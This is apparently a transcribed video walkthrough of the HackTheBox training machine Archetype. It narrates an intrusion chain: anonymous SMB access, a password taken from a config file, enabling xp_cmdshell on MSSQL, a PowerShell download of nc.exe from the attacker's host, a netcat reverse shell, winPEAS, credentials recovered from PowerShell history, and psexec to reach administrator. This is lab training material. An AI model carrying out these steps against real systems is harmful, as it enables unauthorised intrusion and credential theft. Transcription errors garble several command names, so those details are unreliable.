What's going on, YouTube? This is HackTheBox here, and today we're going to be working on the machine called Archetype. And this is the first machine on the tier 2 HackTheBox starting point. And now for this box, we'll be using shells to gain user access and the Windows script known as WinPs to gain privilege escalation to admin level access, all while in a Microsoft SQL server. So I've already made the honors of starting out the machine and I got the IP. And the first question is, which TCP port is hosting a database server? So we're going to be performing an Nmap scan for that. So Nmap-sv for service enumeration and sc for default script, the IP address. So we have port 135, 139, 445 and 1433. So this is going to be port 1433 since we see the Microsoft SQL server running on it, and the Microsoft SQL server is a relational database, so the data are connected to one another. So that's going to be 1433. And now it says, what is the name of the non-administrative share available over SMB? So for this we're going to use smbclient. So smbclient -l to list the shares and then specify the machine's IP. And now the password is, there's no password for it, so you just click enter and we're going to see the shares. So how do we distinguish between the administrative shares and the non-administrative shares? So the administrative shares have the $sign at the back of them, and the non don't have the $sign at their back. So the answer is going to be backups. Now it says, what is the password identified in the file on the SMB shares? So for this we're going to have to connect to the SMB share by itself. So smbclient the IP and backups /backups. And the same goes with this, so just click enter because it doesn't have a password. And we can see we're in the smbclient already. So we're going to use the IR, and we can see that we have a prod.config file. Sorry. So to use this, we just use the get command to download it onto our system. Prod.config, and we can see that we already have it in our system. I'm going to open another, and we could see it here already. So cat.config. So from reading the file, we could see that we have a password here, which is megacop123, and we could see the user ID, which is Archetype SQLVC. So I guess that's going to be for further into the box. Oh yeah, so we're going to read the password. So task 4 says, what script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL server? So we're going to be going to the Impacket repository on GitHub. Okay. And then we could see the list of the scripts are going to be in the secure auth link. And from there we just look for Microsoft SQL. We have PSS, which we're going to be using in the future. We have Kerberos, Windows Secrets, Server Tools, WMI, non-vulnerabilities, SMB, MSQL. So we're going to be using the MSQL client.py. I already have it downloaded, so just MSQL client.py. And submit. Account is working. Testing. Okay. Okay, so now moving on, it says task 5, what extended stored procedure of Microsoft SQL server can be used in order to spawn a Windows command shell. So we're first going to be using the MSQL. I'm going to open another. I don't need this. Okay, then I can just use the cd pack. So these are the script that we're going to be using. We have the MySQL, we have the netcat.exe for the var shell, and we have the ps.exec from the Impacket as well. And this is, I have a link, all the links are going to be in here. So we have netcat.exe, and I'm going to be adding it to the information on the video. I'm just going to clear this out. So MSSQL, go to execute, we use MS. I'm using Python 3, so I specify Python 3, then the name of the script, and -h for help if you don't know how to use it yet. And then we see that we need to specify username, which we already have, then the password and the IP address. So clearing this out again. Username is password, the machine's IP address, enter. Okay, so it didn't work, and let's try looking at. It says encryption required. So we're going to be using the -Windows authentication, which specifies whether or not to use the Windows authentication in the process. So let me clear it out again to make it clear and extend. Okay, -Windows auth. Okay, and it's working now. We have a shell in this. We're connected to the system with a shell, which we use using the MSSQL client.py script. And now if I use help, since we don't know what command to run yet, and we could see lcd, we could see exit, we could see enable sp shell, we could see disable sp command shell, we could see sp_command shell, and the command that we want to run. So if I use sp_cmd shell dir, okay, so it's giving us an error. And now the reason why it's giving us this error is that we haven't enabled the sp shell, and by default it is disabled. So we use enable_sp_cmd shell, and now the command should work. Okay, and it does. I'm just going to clear this out with Ctrl-L. So the answer to this is going to be sp_cmd shell. Now it says what script can be used in order to search for possible path to escalate privileges on Windows host. And now this is going to be the WinPs script. And like I said earlier, you could download it from the link I'm going to put in the description. So we're going to be moving on. It says what file contains the administrator password. So first we're going to be using the submit. We're going to be getting the user flag because we have access to the user directory first. So we're going to be running the sp command with PowerShell. But before we do that, I'm probably going to need to upload a netcat file, which is going to execute commands that are going to get back to our listener, so we could have a more proper shell on the system. So let me go to back again. Now we could see the nc.exe file, and that's going to be our netcat remote shell, reverse shell I mean. So we're going to set up a Python service on here. Okay, and we could see it running already, and we're going to need our tune 0 IP address, which is over here. And if you don't have this on your system, you could just run this instead. ifconfig and you're going to need this IP address right here. You can see that it's the same thing with this one over here. So just cancel this out, and that's running. Okay, and now we'll go back to our SQL service, and we run the sp command cmd shell PowerShell. We're going to be using PowerShell .exe wget http //r20 IP address .7, and then remember the ports. So if we go back to the Python script, we're going to see the port over here, so just remember that. And then the nc.exe. Now this is very important, because if you see here, we have the nc.exe right here, and we open our server there, because if we don't have it there, we're gonna have to be moving around the system, and this is the more quicker way to do that than moving around the system. And we use the -out file, copy the file to the user's public directory on the Windows service. Okay, so what this script it does is that it tells PowerShell to execute and then get the file from the from our service using the .0 IP, and then it outputs the file to this directory. And I click enter. Okay, and it says output. And now to confirm if we have the file, we could just check out the Python and logs, and we could see that there was a GET request made for the nc.exe file. So that means it was successful, because we also have a 200 status code right here. So I go back there, and now we could run a netcat listener as well, so that we could listen in before we execute. So -L is for listening mode, -V is for verbose output, -N is for numeric IP, and P is for port. So I click enter, and now it's listening on port 444. So we're just waiting to start the nc.exe that we uploaded just now, so that it could get back to this place. So to do that, we just use sp_cmd shell. So specify this location, because that's where the netcat listener is staying at. Use the -e and cmd.exe, and then our 200 IP again, and then the port that we want the netcat listener to receive. So what this does is it executes the command, the nc.exe, using the cmd.exe file, and then it sends it on to this IP address and this port. So if we go back to our netcat list now, we should see Windows. So we could see it right here. And we could see that we are the Archetype XQL_SVCs, meaning that we have already made a more user-friendly shell connection. And now if you traverse through the network, let's go to the users section. Oh, sorry. So this was where we uploaded the file. We could see it here, and that was executed. So if we move around the network, let's go to the let's go back one step. Okay, let's go to the SQL, so that's our directory. And now we can't use the tab function because Netcard doesn't support it. We just have to, so we have to reconfigure some things in Netcard before we could use the cat function, the tab function, which one will complete for us. And we could see the files assigned to the sq_svc. So let's go to the desktop since that's new. And we have our user.txt right here. And we could just use type user.txt. And we can't submit that yet, but we already have the user flag. And I just copy this and create another file in the app directory. So now to get admin access, we need to use privileged escalation in this server. So we're going to be uploading the winpiece.exe this time around, and we can see that we already have it in the directory where the Python service is on. So we just go back to the shell that we just made, the one that was much user friendly. I'm going to close this out. Yeah, this one. Ctrl L. Okay, so this time around we'll just be using PowerShell wget http //atom0 IP address, the port, don't forget the port, the file name x64.exe out file, win is x64.exe, and that's the name of the file, and I just click enter. So PowerShell is going to make a get request to this link, and it downloads the file to this directory that we're in, if I'm not correct. Yeah, so we could see the file right here, and if you check the Python script, we will see that a get request was made for the winpiece.x64.exe file with a 200 status code, meaning that it was okay connection. And now to run it, we just use winpiece x64.exe and just click enter, and we can see that it's running, so we just wait. And the question was, what file contains the administrator password? Okay, I'm gonna close this out. And the animation is done, and we have some files right here. So we could first go to the first one right here, and I'm just going to copy this one. So I'm not copying this because we can't cd into a file, we can only cd into a directory, so we're cding into this directory. So we use cd and then just paste it, this clipboard, and we can see this console_history.txt file, and if I use type console_history.txt, we could see that we have so we have the administrator user and the password, which is megacop_for_admin and 2 exclamation marks. So the answer is to the task 7 is gonna be this. I'm just gonna copy it out. Okay, and let's not forget our user flag. Yeah, that was correct. And now just remains the root flag. So we're going to be working on the root flag now. So to get the root flag, we're going to be running another script. So I'm just going to close all this out. And the script that we're running is the ps-exec script, which we can get from the Impacket. So I'm just going to open it so you guys can see it. Okay, so this is the script that we're going to be running, the ps-exec, and you could just download it from there. Okay, so let's run that. cd there, and you could see I already have the script right here, and to run it we just use ps. Okay, so we're going to be running the Python script ps-exec, and I already added the administrator and then the IP address. So always make sure to copy the password to our place. I just had to restart the machine and get the password now. Okay, and then the password was megacop_4dm1n and 2 exclamation marks, and enter. And you could see that we already have a shell as well with the ps-exec script. And we could go back to the desktop directory, since that's where we found the user flag earlier. So if we use cd /users/public dir. Okay, so I think I went too far. So cd administrator, cd desktop, and we have a root flag right here. So I use pipe root.txt, and that's going to be our root flag for this box. Thank you guys for watching the video, and happy new year to everyone watching it. Have a nice day. Thank you.